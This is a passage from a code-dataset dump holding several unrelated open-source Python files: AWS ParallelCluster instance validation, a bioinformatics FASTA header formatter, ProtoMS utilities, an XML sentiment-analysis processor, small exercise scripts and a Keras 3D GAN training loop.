Useful since a successful run_instance call signals 'DryRunOperation'.\"\"\"\n try:\n boto3.client(\"ec2\").run_instances(**kwargs)\n except ClientError as e:\n code = e.response.get(\"Error\").get(\"Code\")\n message = e.response.get(\"Error\").get(\"Message\")\n subnet_id = kwargs[\"NetworkInterfaces\"][0][\"SubnetId\"]\n if code == \"DryRunOperation\":\n pass\n elif code == \"UnsupportedOperation\":\n if \"does not support specifying CpuOptions\" in message:\n pcluster_config.error(message.replace(\"CpuOptions\", \"disable_hyperthreading\"))\n pcluster_config.error(message)\n elif code == \"InstanceLimitExceeded\":\n pcluster_config.error(\n \"You've reached the limit on the number of instances you can run concurrently \"\n \"for the configured instance type.\\n{0}\".format(message)\n )\n elif code == \"InsufficientInstanceCapacity\":\n pcluster_config.error(\"There is not enough capacity to fulfill your request.\\n{0}\".format(message))\n elif code == \"InsufficientFreeAddressesInSubnet\":\n pcluster_config.error(\n \"The specified subnet does not contain enough free private IP addresses \"\n \"to fulfill your request.\\n{0}\".format(message)\n )\n elif code == \"InvalidParameterCombination\":\n if \"associatePublicIPAddress\" in message:\n # Instances with multiple Network Interfaces cannot currently take public IPs.\n # This check is meant to warn users about this problem until services are fixed.\n pcluster_config.warn(\n \"The instance type '{0}' cannot take public IPs. \"\n \"Please make sure that the subnet with id '{1}' has the proper routing configuration to allow \"\n \"private IPs reaching the Internet (e.g. a NAT Gateway and a valid route table).\".format(\n kwargs[\"InstanceType\"], subnet_id\n )\n )\n elif code == \"Unsupported\" and get_availability_zone_of_subnet(\n subnet_id\n ) not in get_supported_az_for_one_instance_type(kwargs[\"InstanceType\"]):\n # If an availability zone without desired instance type is selected, error code is \"Unsupported\"\n # Therefore, we need to write our own code to tell the specific problem\n current_az = get_availability_zone_of_subnet(subnet_id)\n qualified_az = get_supported_az_for_one_instance_type(kwargs[\"InstanceType\"])\n pcluster_config.error(\n \"Your requested instance type ({0}) is not supported in the Availability Zone ({1}) of \"\n \"your requested subnet ({2}). Please retry your request by choosing a subnet in \"\n \"{3}. \".format(kwargs[\"InstanceType\"], current_az, subnet_id, qualified_az)\n )\n else:\n pcluster_config.error(\n \"Unable to validate configuration parameters for instance type '{0}'. 
\"\n \"Please double check your cluster configuration.\\n{1}\".format(kwargs[\"InstanceType\"], message)\n )\n\n def _get_latest_alinux_ami_id(self):\n \"\"\"Get latest alinux ami id.\"\"\"\n try:\n alinux_ami_id = (\n boto3.client(\"ssm\")\n .get_parameters_by_path(Path=\"/aws/service/ami-amazon-linux-latest\")\n .get(\"Parameters\")[0]\n .get(\"Value\")\n )\n except ClientError as e:\n error(\"Unable to retrieve Amazon Linux AMI id.\\n{0}\".format(e.response.get(\"Error\").get(\"Message\")))\n raise\n\n return alinux_ami_id\n\n def public_ips_in_compute_subnet(self, pcluster_config, network_interfaces_count):\n \"\"\"Tell if public IPs will be used in compute subnet.\"\"\"\n vpc_section = pcluster_config.get_section(\"vpc\")\n head_node_subnet_id = vpc_section.get_param_value(\"master_subnet_id\")\n compute_subnet_id = vpc_section.get_param_value(\"compute_subnet_id\")\n use_public_ips = vpc_section.get_param_value(\"use_public_ips\") and (\n # For single NIC instances we check only if subnet is the same of head node\n (not compute_subnet_id or compute_subnet_id == head_node_subnet_id)\n # For multiple NICs instances we check also if subnet is different\n # to warn users about the current lack of support for public IPs\n or (network_interfaces_count > 1)\n )\n\n return use_public_ips\n\n def build_launch_network_interfaces(\n self, network_interfaces_count, use_efa, security_group_ids, subnet, use_public_ips\n ):\n \"\"\"Build the needed NetworkInterfaces to launch an instance.\"\"\"\n network_interfaces = []\n for device_index in range(network_interfaces_count):\n network_interfaces.append(\n {\n \"DeviceIndex\": device_index,\n \"NetworkCardIndex\": device_index,\n \"InterfaceType\": \"efa\" if use_efa else \"interface\",\n \"Groups\": security_group_ids,\n \"SubnetId\": subnet,\n }\n )\n\n # If instance types has multiple Network Interfaces we also check for\n if network_interfaces_count > 1 and use_public_ips:\n network_interfaces[0][\"AssociatePublicIpAddress\"] = True\n return network_interfaces\n\n\ndef infer_cluster_model(config_parser=None, cluster_label=None, cfn_stack=None):\n \"\"\"\n Infer the cluster model from the provided configuration.\n\n The configuration can be provided as coming from CloudFormation (CfnParams) or from config_file, with cluster label\n and a config_parser instance.\n \"\"\"\n return (\n _infer_cluster_model_from_cfn(cfn_stack)\n if cfn_stack\n else _infer_cluster_model_from_file(config_parser, cluster_label)\n )\n\n\ndef _infer_cluster_model_from_file(config_parser, cluster_label):\n \"\"\"\n Infer the cluster model from the configuration file.\n\n SIT style config files are supported also with Slurm, so check is performed on queue_settings.\n \"\"\"\n return (\n ClusterModel.HIT\n if config_parser.has_option(\"cluster {0}\".format(cluster_label), \"queue_settings\")\n else ClusterModel.SIT\n )\n\n\ndef _infer_cluster_model_from_cfn(cfn_stack):\n \"\"\"\n Infer the cluster model from cfn params.\n\n Only HIT model is allowed to be stored if scheduler is Slurm, so checking the scheduler is enough to determine the\n cluster model.\n \"\"\"\n return ClusterModel.HIT if is_hit_enabled_cluster(cfn_stack) else ClusterModel.SIT\n\n\ndef get_cluster_model(name):\n \"\"\"Get the cluster model by name.\"\"\"\n # Simple binary check; no additional cluster models are expected in the next future.\n return ClusterModel.HIT if ClusterModel.HIT.name == name else ClusterModel.SIT\n\n\ndef load_cluster_models():\n \"\"\"Load supported cluster models.\"\"\"\n from 
pcluster.models.hit.hit_cluster_model import HITClusterModel\n from pcluster.models.sit.sit_cluster_model import SITClusterModel\n\n ClusterModel.HIT = HITClusterModel()\n ClusterModel.SIT = SITClusterModel()\n\n\nload_cluster_models()\n","repo_name":"rsips/cc_net","sub_path":"venv/lib/python3.7/site-packages/pcluster/cluster_model.py","file_name":"cluster_model.py","file_ext":"py","file_size_in_byte":8895,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"28312817936","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport os\nimport re\nimport sys\nimport logging\nimport argparse\n\nLOG = logging.getLogger(__name__)\n\n__version__ = \"1.0.1\"\n__author__ = (\"Xingguo Zhang\",)\n__email__ = \"invicoun@foxmail.com\"\n__all__ = []\n\n\ndef format_argannot(seqid):\n\n seqid = seqid.split()[0]\n db, gene, gbid = seqid.split(\"~~~\", 2)\n gene = gene.split(\")\")\n seqid = \">%s%s) %s\" % (gene[0], gene[1], gbid)\n\n return seqid\n\n\ndef format_card(seqid):\n\n seqid = seqid.split(\"~~~\")\n seqid = \">%s\" % \" \".join(seqid[1::])\n\n return seqid\n\n\ndef format_megares(seqid):\n\n seqid= seqid.split(\"~~~\")\n seqid = \">%s(%s) %s\" % (seqid[2], seqid[1], seqid[3])\n\n return seqid\n\n\ndef format_ncbi(seqid):\n\n seqid= seqid.split(\"~~~\")\n seqid = \">%s\" % \" \".join(seqid[1::])\n\n return seqid\n\n\ndef format_plasmidfinder(seqid):\n\n seqid= seqid.split(\"~~~\")\n seqid = \">%s %s\" % (seqid[1], seqid[2])\n\n return seqid\n\n\ndef abricate_seq2format(file):\n\n for line in open(file):\n line = line.strip()\n\n if not line:\n continue\n if line.startswith(\">argannot\"):\n print(format_argannot(line))\n elif line.startswith(\">card~~~\"):\n print(format_card(line))\n elif line.startswith(\">megares~~~\"):\n print(format_megares(line))\n elif line.startswith(\">ncbi~~~\"):\n print(format_ncbi(line))\n elif line.startswith(\">plasmidfinder~~~\"):\n print(format_plasmidfinder(line))\n else:\n print(line)\n\n return 0\n\n\ndef add_hlep_args(parser):\n\n parser.add_argument(\"input\", metavar=\"FILE\", type=str,\n help=\"Input the fasta,(fasta)\")\n\n return parser\n\n\ndef main():\n\n logging.basicConfig(\n stream=sys.stderr,\n level=logging.INFO,\n format=\"[%(levelname)s] %(message)s\"\n )\n parser = argparse.ArgumentParser(formatter_class=argparse.RawDescriptionHelpFormatter,\n description='''\nFor exmple:\n abricate_seq2format.py OXA.fasta > OXA_new.fasta\n\nversion: %s\ncontact: %s <%s>\\\n ''' % (__version__, \" \".join(__author__), __email__))\n\n args = add_hlep_args(parser).parse_args()\n\n abricate_seq2format(args.input)\n\n\nif __name__ == \"__main__\":\n\n main()\n","repo_name":"zxgsy520/superbug","sub_path":"abricate_seq2format.py","file_name":"abricate_seq2format.py","file_ext":"py","file_size_in_byte":2239,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"29012392710","text":"from __future__ import annotations\nfrom typing import List\n\nfrom app.classes.events.custom_event.noun_phrase import NounPhrase, NPTextType\nfrom app.classes.events.custom_event.verb import Verb, VerbType\nfrom app.classes.events.custom_event.predicate import Predicate\nfrom app.classes.events.custom_event.adverb import Adverb\nfrom app.classes.events.custom_event.prep_phrase import PrepPhrase\nfrom app.classes.helpers.list_eq import ClassHelpers\n\nclass CustomEvent:\n def __init__(\n self, \n subj: NounPhrase = None, \n verb: Verb = None, \n adverb: Adverb = None, \n 
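# dobj/predicate/pps capture the object side of the clause\n        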
dobj: NounPhrase = None, \n predicate: Predicate = None, \n pps:List[PrepPhrase] = None,\n is_new: bool = True\n ):\n self.subj = subj\n self.verb = verb\n self.adverb = adverb\n self.dobj = dobj\n self.predicate = predicate\n self.pps = pps\n self.is_new = is_new\n\n\n def event_key(self):\n a = self._split_name()\n c = [x.lower() for x in a.split(' ')]\n d = '_'.join(c)\n e = f'evt_{d}'\n return e\n\n def get_declaration_name(self):\n a = self._split_name()\n c = [x.title() for x in a.split(' ')]\n return ''.join(c)\n \n\n def _split_name(self) -> str:\n # ROLE, VERB, OBJ\n a = []\n\n # ROLE\n if self.verb.verb_type in [VerbType.LINKING, VerbType.INTRANSITIVE]:\n if self.subj.is_role:\n a.append('agent')\n else:\n a.append(self.subj.to_text(NPTextType.BASIC))\n\n # VERB\n if self.verb.verb_type in [VerbType.TRANSITIVE, VerbType.INTRANSITIVE]:\n a.append(self.verb.lemma)\n \n # OBJ\n if self.verb.verb_type == VerbType.TRANSITIVE:\n if self.dobj.is_parm:\n split_parm = self.dobj.str_val[1:-1].replace('_', ' ').lower()\n a.append(split_parm)\n elif self.dobj.asset_type != 'Money':\n a.append(self.dobj.head)\n\n elif self.verb.verb_type == VerbType.LINKING:\n a.append(self.predicate.pred_str)\n \n if self.adverb:\n a.append(self.adverb.adverb_str)\n \n return ' '.join(a)\n\n\n def __eq__(self, other: CustomEvent) -> bool:\n return self.subj == other.subj and \\\n self.dobj == other.dobj and \\\n self.verb == other.verb and \\\n self.adverb == other.adverb and \\\n self.predicate == other.predicate and \\\n self.is_new == other.is_new and \\\n ClassHelpers.lists_eq(self.pps, other.pps, 'pp_str')\n\n\n","repo_name":"reganmeloche/symboleo-nlp","sub_path":"app/classes/events/custom_event/custom_event.py","file_name":"custom_event.py","file_ext":"py","file_size_in_byte":2621,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"31951979061","text":"import logging\nimport numpy as np\nimport os\nimport subprocess\n\nlogger = logging.getLogger('protoms')\n\n\ndef _is_float(num):\n \"\"\"\n Check whether a string is convertible to a float\n\n Parameters\n ----------\n num : string\n the string which might be convertible to float\n\n Returns\n -------\n boolean\n whether the string is convertible to float\n \"\"\"\n try:\n float(num)\n except (ValueError, TypeError):\n return False\n return True\n\n\ndef _get_prefix(filename):\n \"\"\"\n Remove extension (including period from a filename)\n\n Parameters\n ----------\n filename : string\n the filename to modify\n\n Returns\n -------\n string\n the filename without extension\n \"\"\"\n h, t = os.path.splitext(filename)\n return h\n\n\ndef _locate_file(filename, folders):\n \"\"\"\n Find a file\n\n Tries to find the file as it is given or in\n any of the folders given\n\n Parameters\n ----------\n filename : string\n the name of the file to find\n folders : list of strings\n folders to search for the file\n\n Returns\n -------\n string or None\n the full filename or None if the file could not be found\n \"\"\"\n # Try to see if the filename as given exists\n if os.path.isfile(filename):\n return filename\n else:\n # Remove everything but the actual filename\n h, t = os.path.split(filename)\n # Loop over all folder and try to find it there\n for f in folders:\n test = os.path.join(f, t)\n if os.path.isfile(test):\n return test\n # If we haven't found it up to now, give up and return None\n return None\n\n\ndef rotmat_x(alpha):\n \"\"\"\n 3D rotation matrix for rotations about x-axis.\n\n 
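Uses the right-handed convention: a positive alpha rotates the y-axis toward the z-axis.\n\n    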
Parameters\n ----------\n alpha : float or integer\n the angle (in radians) by which rotation is performed about the x-axis.\n\n Returns\n -------\n numpy array\n the rotation matrix for the desired angle.\n \"\"\"\n return (np.mat([[1.0, 0.0, 0.0], [0.0, np.cos(alpha), -np.sin(alpha)],\n [0.0, np.sin(alpha), np.cos(alpha)]]))\n\n\ndef rotmat_y(beta):\n \"\"\"\n 3D rotation matrix for rotations about x-axis.\n\n Parameters\n ----------\n beta : float or integer\n the angle (in radians) by which rotation is performed about the y-axis.\n\n Returns\n -------\n numpy array\n the rotation matrix for the desired angle.\n \"\"\"\n return (np.mat([[np.cos(beta), 0.0, np.sin(beta)], [0.0, 1.0, 0.0],\n [-np.sin(beta), 0.0, np.cos(beta)]]))\n\n\ndef rotmat_z(gamma):\n \"\"\"\n 3D rotation matrix for rotations about x-axis.\n\n Parameters\n ----------\n gamma : float or integer\n the angle (in radians) by which rotation is performed about the z-axis.\n\n Returns\n -------\n numpy array\n the rotation matrix for the desired angle.\n \"\"\"\n return (np.mat([[np.cos(gamma), -np.sin(gamma), 0.0],\n [np.sin(gamma), np.cos(gamma), 0.0], [0.0, 0.0, 1.0]]))\n\n\ndef _cleanup(tarlist):\n \"\"\"\n Clean up extra files\n\n Parameters\n ----------\n tarlist : list of string\n the files to be cleaned up\n \"\"\"\n tarlist2 = []\n for filename in tarlist:\n if filename in tarlist2:\n continue\n if filename.find(os.environ[\"PROTOMSHOME\"]) == 0:\n continue\n tarlist2.append(filename)\n\n logger.info(\"\")\n logger.info(\"Cleaning up and saving extra files to prep_files.tar\")\n logger.debug(\"The files are: %s\" % \" \".join(tarlist2))\n subprocess.call(\n \"tar -cf prep_files.tar %s\" % \" \".join(tarlist2), shell=True)\n subprocess.call(\"rm -f %s\" % \" \".join(tarlist2), shell=True)\n","repo_name":"essex-lab/ProtoMS","sub_path":"python/protomslib/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":3701,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"18"} +{"seq_id":"43635961874","text":"import unicodedata\nimport xml.etree.ElementTree as ET\nimport xml.dom.minidom\nfrom Logic.Analizador import Analizador\nfrom datetime import datetime\nimport re\n\nclass ProcesarArchivo:\n def __init__(self, xml_file_path):\n self.xml_file_path = xml_file_path\n\n def normalizar_texto(self, texto):\n # Convierte el texto a minúsculas\n texto = texto.lower()\n\n # Normaliza el texto para eliminar tildes y acentos\n texto_normalizado = ''.join(unicodedata.normalize('NFKD', c) for c in texto)\n\n # Elimina los caracteres que no son letras\n texto_normalizado = ''.join(c for c in texto_normalizado if not unicodedata.combining(c))\n\n return texto_normalizado\n\n def procesar_xml(self, mensaje_xml):\n try:\n treeXML = ET.parse(self.xml_file_path)\n rootXML = treeXML.getroot()\n root = mensaje_xml\n \n if len(rootXML) == 0:\n # Si no existe, crea un nuevo elemento MENSAJES\n print(\"No existen\")\n root = ET.Element('MENSAJES')\n else:\n for mensaje in root:\n # Normaliza el contenido del mensaje (convertir a minúsculas y quitar tildes)\n texto_fecha = mensaje.find('FECHA').text\n texto_mensaje = mensaje.find('TEXTO').text\n analizador = Analizador(texto_fecha, texto_mensaje)\n analizador.analizar_texto()\n analizador.generarArchivo()\n print(texto_mensaje)\n texto_normalizado = self.normalizar_texto(texto_mensaje)\n \n print(\"Texto normalizado\")\n print(texto_normalizado)\n mensaje.find('TEXTO').text = texto_normalizado\n rootXML.append(mensaje)\n \n\n # Agrega el 
mensaje XML al elemento MENSAJES\n \n\n # Guarda el árbol XML actualizado en el archivo\n tree = ET.ElementTree(rootXML)\n tree.write(self.xml_file_path)\n\n return 'Archivo XML procesado correctamente'\n except Exception as e:\n return 'Error al procesar el archivo XML: ' + str(e)\n\n def grabar_configuracion(self, configuracion_xml):\n try:\n treeDiccionario = ET.parse(self.xml_file_path)\n rootDiccionario = treeDiccionario.getroot()\n root = configuracion_xml\n\n palabras_positivas = [palabra.text for palabra in rootDiccionario.find('sentimientos_positivos')]\n palabras_negativas = [palabra.text for palabra in rootDiccionario.find('sentimientos_negativos')]\n palabras_negativas_rechasadas = [palabra.text for palabra in rootDiccionario.find('sentimientos_negativos_rechazados')]\n palabras_positivas_rechasadas = [palabra.text for palabra in rootDiccionario.find('sentimientos_positivo_rechazados')]\n contador_palabras_positivas=0\n contador_palabras_negativas=0\n for sentimientos in root:\n tipo_sentimientos = sentimientos.tag\n for palabra_element in sentimientos.findall('palabra'):\n palabra = palabra_element.text\n # Normaliza el texto\n palabra = self.normalizar_texto(palabra)\n\n # Verifica si la palabra ya existe en el diccionario antes de agregarla\n if palabra not in [palabra.text for palabra in rootDiccionario.find(tipo_sentimientos)]:\n nueva_palabra = ET.Element('palabra')\n nueva_palabra.text = palabra\n \n\n # Verifica si la palabra positiva existe en las negativas y viceversa\n if tipo_sentimientos == 'sentimientos_positivos' and palabra in palabras_negativas:\n print(\"Sentimiento positivo en negativo\")\n sentimientos_rechazados = rootDiccionario.find('sentimientos_positivo_rechazados')\n nueva_palabra_rechazada = ET.Element('palabra')\n nueva_palabra_rechazada.text = palabra\n sentimientos_rechazados.append(nueva_palabra_rechazada)\n \n elif tipo_sentimientos == 'sentimientos_negativos' and palabra in palabras_positivas:\n print(\"Sentimiento negativo en positivo\")\n sentimientos_rechazados = rootDiccionario.find('sentimientos_negativos_rechazados')\n nueva_palabra_rechazada = ET.Element('palabra')\n nueva_palabra_rechazada.text = palabra\n sentimientos_rechazados.append(nueva_palabra_rechazada)\n else:\n rootDiccionario.find(tipo_sentimientos).append(nueva_palabra)\n if tipo_sentimientos == 'sentimientos_positivos':\n contador_palabras_positivas+=1\n elif tipo_sentimientos == 'sentimientos_negativos':\n contador_palabras_negativas+=1\n \n # Guarda el árbol XML del diccionario actualizado en el archivo\n treeDiccionario = ET.ElementTree(rootDiccionario)\n treeDiccionario.write(self.xml_file_path)\n \n # Contar las palabras en cada categoría\n num_palabras_positivas_rechazadas = len(palabras_positivas_rechasadas)\n num_palabras_negativas_rechazadas = len(palabras_negativas_rechasadas)\n\n # Crear un nuevo árbol XML para el resumen\n resumen_configuracion = ET.Element('CONFIG_RECIBIDA')\n ET.SubElement(resumen_configuracion, 'PALABRAS_POSITIVAS').text = str(contador_palabras_positivas)\n ET.SubElement(resumen_configuracion, 'PALABRAS_POSITIVAS_RECHAZADA').text = str(num_palabras_positivas_rechazadas)\n ET.SubElement(resumen_configuracion, 'PALABRAS_NEGATIVAS').text = str(contador_palabras_negativas)\n ET.SubElement(resumen_configuracion, 'PALABRAS_NEGATIVAS_RECHAZADA').text = str(num_palabras_negativas_rechazadas)\n\n # Crear el árbol XML y escribirlo en el archivo \"resumenConfig.xml\"\n resumen_tree = ET.ElementTree(resumen_configuracion)\n \n xml_string = 
ET.tostring(resumen_configuracion, encoding='utf-8').decode()\n xml_string = xml.dom.minidom.parseString(xml_string).toprettyxml()\n with open('DB/resumenConfigTemp.xml', 'w') as xml_file:\n xml_file.write(xml_string)\n\n num_palabras_positivas = len(palabras_positivas)\n num_palabras_negativas = len(palabras_negativas)\n resumen_configuracionTodo = ET.Element('CONFIG_RECIBIDA')\n ET.SubElement(resumen_configuracionTodo, 'PALABRAS_POSITIVAS').text = str(num_palabras_positivas)\n ET.SubElement(resumen_configuracionTodo, 'PALABRAS_POSITIVAS_RECHAZADA').text = str(num_palabras_positivas_rechazadas)\n ET.SubElement(resumen_configuracionTodo, 'PALABRAS_NEGATIVAS').text = str(num_palabras_negativas)\n ET.SubElement(resumen_configuracionTodo, 'PALABRAS_NEGATIVAS_RECHAZADA').text = str(num_palabras_negativas_rechazadas)\n \n with open('DB/resumenConfig.xml', 'w') as xml_file:\n xml_file.write(xml_string)\n\n return 'Archivo XML procesado correctamente'\n except Exception as e:\n return 'Error al procesar el archivo XML: ' + str(e)\n\n def consultarSentimientos(self, fechaInicial, fechaFinal):\n with open(\"DB/mensajes.xml\", \"r\") as xml_file:\n xml_content = xml_file.read()\n resultadoMensaje=\"\"\n for mensaje in xml_content:\n fecha = mensaje.find('FECHA').text\n fecha_str= re.search(r'\\d{2}/\\d{2}/\\d{4}', self.fecha)\n fechaResultado=\"\"\n\n if fecha_str:\n fecha_str = fecha_str.group()\n formato = \"%d/%m/%Y\"\n\n try:\n fechfechaResultado = datetime.strptime(fecha_str, formato).date()\n fechaResultado = fecha.strftime(\"%d/%m/%Y\")\n except ValueError:\n fechaResultado = None\n else:\n fechaResultado = None\n\n if fechaResultado >= fechaInicial and fechaResultado <= fechaFinal:\n texto = mensaje.find('TEXTO').text\n analizador = Analizador(fecha, texto)\n resultado = analizador.analizarSentimientos(texto)\n resultadoMensaje+= \"Fecha: \"+ fechaResultado + \"\\n\" + resultado\n return resultadoMensaje\n\n def consultarHashtags(self, fechaInicial, fechaFinal):\n resultadoMensaje = \"\"\n \n try:\n tree = ET.parse(\"DB/mensajes.xml\")\n root = tree.getroot()\n\n for mensaje in root.iter('MENSAJE'):\n fecha_str = mensaje.find('FECHA').text\n fechaResultado = \"\"\n \n fecha_match = re.search(r'\\d{2}/\\d{2}/\\d{4}', fecha_str)\n \n if fecha_match:\n fecha_str = fecha_match.group()\n formato = \"%d/%m/%Y\"\n \n try:\n fechaResultado = datetime.strptime(fecha_str, formato).date()\n fechaResultado = fechaResultado.strftime(\"%d/%m/%Y\")\n except ValueError:\n fechaResultado = None\n print(\"Fecha inicial \"+ fechaInicial)\n print(\"Fecha final \"+ fechaFinal)\n print(\"R\"+fechaResultado)\n\n if fechaInicial <= fechaResultado <= fechaFinal:\n texto = mensaje.find('TEXTO').text\n print(\"Entroo\")\n print(texto)\n analizador = Analizador(fecha_str, texto)\n resultado = analizador.analizarHashtags(texto)\n resultadoMensaje += \"Fecha: \" + fechaResultado + \"\\n\" + resultado\n except Exception as e:\n resultadoMensaje = \"Error al procesar el archivo XML: \" + str(e)\n \n return resultadoMensaje\n \n def consultarMenciones(self, fechaInicial, fechaFinal):\n resultadoMensaje = \"\"\n \n try:\n tree = ET.parse(\"DB/mensajes.xml\")\n root = tree.getroot()\n\n for mensaje in root.iter('MENSAJE'):\n fecha_str = mensaje.find('FECHA').text\n fechaResultado = \"\"\n \n fecha_match = re.search(r'\\d{2}/\\d{2}/\\d{4}', fecha_str)\n \n if fecha_match:\n fecha_str = fecha_match.group()\n formato = \"%d/%m/%Y\"\n \n try:\n fechaResultado = datetime.strptime(fecha_str, formato).date()\n fechaResultado = 
fechaResultado.strftime(\"%d/%m/%Y\")\n except ValueError:\n fechaResultado = None\n print(\"Fecha inicial \"+ fechaInicial)\n print(\"Fecha final \"+ fechaFinal)\n print(\"R\"+fechaResultado)\n\n if fechaInicial <= fechaResultado <= fechaFinal:\n texto = mensaje.find('TEXTO').text\n print(\"Entroo\")\n print(texto)\n analizador = Analizador(fecha_str, texto)\n resultado = analizador.analizarMenciones(texto)\n resultadoMensaje += \"Fecha: \" + fechaResultado + \"\\n\" + resultado\n except Exception as e:\n resultadoMensaje = \"Error al procesar el archivo XML: \" + str(e)\n \n return resultadoMensaje\n \n","repo_name":"Carbonell-Castillo/Proyecto-de-Analisis-de-Sentimientos-en-Twitter","sub_path":"Logic/ProcesarArchivo.py","file_name":"ProcesarArchivo.py","file_ext":"py","file_size_in_byte":11993,"program_lang":"python","lang":"es","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"} +{"seq_id":"12801834011","text":"#\n# @lc app=leetcode id=989 lang=python3\n#\n# [989] Add to Array-Form of Integer\n#\n\n# @lc code=start\nclass Solution:\n def addToArrayForm(self, num: List[int], k: int) -> List[int]:\n # chuyển mảng về dạng số nguyên \n\n numsk = int(''.join(map(str,num)))\n # tổng các số \n sumk=numsk+k\n #chuyển về dạng mảng \n nums=[int(x) for x in str(sumk)]\n return nums\n \n \n# @lc code=end\n\n","repo_name":"cuuchuoiii/leetcode_LeDucChung","sub_path":"bai_989.py","file_name":"bai_989.py","file_ext":"py","file_size_in_byte":453,"program_lang":"python","lang":"vi","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"6934774716","text":"'''Description - Create a small command-line program in Python to calculate the total invoice amount for the below purchases - \nBook - Introduction to Python Programming : Rs 499.00\nBook - Python Libraries Cookbook : Rs. 855.00\nBook - Data Science in Python : Rs. 645.00\nTaxes and additional charges are described as details - \nGST : 12%\nDelivery Charges : Rs. 250.00\n'''\n\nBook1_price=499.00\nBook2_price=855.00\nBook3_price=645.00\nGst=12\nDelivery_charges=250.00\n\nBook_1=print(\"Book - Introduction to python programming : \",Book1_price)\nBook_2=print(\"Book - Python Libraries Cookbook : \",Book2_price)\nBook_3=print(\"Book - Data Science in Python : \",Book3_price)\n\nquantity1=int(input(\"Number of 'Introduction to python programming'Books : \"))\nquantity2=int(input(\"Number of 'Python Libraries Cookbook' Books : \"))\nquantity3=int(input(\"Number of 'Data Science in Python' Books : \"))\n\nTotal_sum=Book1_price*quantity1+Book2_price*quantity2+Book3_price*quantity3\nGst_sum=(Total_sum*Gst)/100\nFinal_sum=Total_sum+Gst_sum+Delivery_charges\n\nprint(\"Your Total Bill is : \",Final_sum)\nprint(\"Thanks for Purchasing! Have a great day!\")\n\n\n'''Description: Write a program in Python to print the number of unique letters in a string. 
Only new letters from the string should be counted and not duplicates.\nInput : string1 = \"India\"\nOutput : uniqueLetters = i,n,d,a\nInput : string1 = \"Dedication\"\nOutput : uniqueLetters = d,e,i,c,a,t,o,n\n'''\n\nString=input(\"String1 = \")\nString_lowercase= String.lower()\nRemove_whitespaces= String_lowercase.replace(\" \",\"\")\nUnique_letters = list(dict.fromkeys(Remove_whitespaces)) # dict.fromkeys keeps first-seen order, unlike set(), so output matches the expected order\nprint(\"UniqueLetters = \")\nfor i in Unique_letters:\n    print(i)\nprint(\"Number of Unique Letters in the string:\",len(Unique_letters))\n \n\n\n\n\n","repo_name":"Tara2610/Herovired-Assignments","sub_path":"Assignment_01.py","file_name":"Assignment_01.py","file_ext":"py","file_size_in_byte":1707,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"11218572812","text":"from models import Generator, Discriminator\nfrom keras.optimizers import Adam\nfrom keras.layers import Input\nfrom keras.models import Model\nfrom dataloader import DataLoader\nimport os\nimport numpy as np\n\ndef train(args):\n    # optimizers\n    dis_optim = Adam(lr=args.discriminator_lr, beta_1=args.beta)\n    gen_optim = Adam(lr=args.generator_lr, beta_1=args.beta)\n\n    # discriminator\n    discriminator = Discriminator(args).build_discriminator()\n    print('Discriminator...')\n    discriminator.summary()\n    discriminator.compile(loss='binary_crossentropy', optimizer=dis_optim)\n\n    # generator\n    generator = Generator(args).build_generator()\n    print('Generator')\n    generator.summary()\n    z = Input(shape=(1, 1, 1, args.latent_dim))\n    img = generator(z)\n\n    # make discriminator not trainable\n    discriminator.trainable = False\n    validity = discriminator(img)\n\n    combined = Model(input=z, output=validity)\n    combined.compile(loss='binary_crossentropy', optimizer=gen_optim)\n\n    # load data\n    data_loader = DataLoader(args)\n    X_train = np.array(data_loader.load_data()).astype(np.float32)\n    dl, gl = [],[]\n    for epoch in range(args.num_epochs):\n        #sample a random batch\n        idx = np.random.randint(len(X_train), size=args.batch_size)\n        # print('Sampling indices...' 
+ str(idx))\n real = X_train[idx]\n\n z = np.random.normal(0, 0.33, size=[args.batch_size, 1, 1, 1, args.latent_dim]).astype(np.float32)\n fake = generator.predict(z)\n\n real = np.expand_dims(real, axis=4)\n # eval_ = np.concatenate((real, fake))\n\n lab_real = np.reshape([1] * args.batch_size, (-1, 1, 1, 1, 1))\n lab_fake = np.reshape([0] * args.batch_size, (-1, 1, 1, 1, 1))\n # print(lab_real.shape)\n\n\n # calculate discriminator loss\n d_loss_real = discriminator.train_on_batch(real, lab_real)\n d_loss_fake = discriminator.train_on_batch(fake, lab_fake)\n\n d_loss = 0.5*np.add(d_loss_real, d_loss_fake)\n\n z = np.random.normal(0, 0.33, size=[args.batch_size, 1, 1, 1, args.latent_dim]).astype(np.float32)\n\n # calculate generator loss\n g_loss = combined.train_on_batch(z, np.reshape([1] * args.batch_size, (-1, 1, 1, 1, 1))).astype(np.float64)\n\n dl.append(d_loss)\n gl.append(g_loss)\n avg_d_loss = round(sum(dl)/len(dl), 4)\n avg_g_loss = round(sum(gl)/len(gl), 4)\n\n print('Training epoch {}/{}, d_loss_real/avg: {}/{}, g_loss/avg: {}/{}'.format(epoch+1, args.num_epochs, round(d_loss, 4), avg_d_loss, round(g_loss, 4), avg_g_loss))\n\n # sampling\n if epoch % args.sample_epoch == 0:\n if not os.path.exists(args.sample_path):\n os.makedirs(args.sample_path)\n print('Sampling...')\n sample_noise = np.random.normal(0, 0.33, size=[args.batch_size, 1, 1, 1, args.latent_dim]).astype(np.float32)\n generated_volumes = generator.predict(sample_noise, verbose=1)\n generated_volumes.dump(args.sample_path + '/sample_epoch_' + str(epoch+1) + '.npy')\n\n # save weights\n if epoch % args.save_epoch == 0:\n if not os.path.exists(args.checkpoints_path):\n os.makedirs(args.checkpoints_path)\n generator.save_weights(args.checkpoints_path + '/generator_epoch_' + str(epoch+1), True)\n discriminator.save_weights(args.checkpoints_path + '/discriminator_epoch_' + str(epoch+1), True)\n\n\n\n\n\n","repo_name":"enochkan/3dgan-keras","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":3447,"program_lang":"python","lang":"en","doc_type":"code","stars":19,"dataset":"github-code","pt":"18"} +{"seq_id":"32213530443","text":"import os\nimport 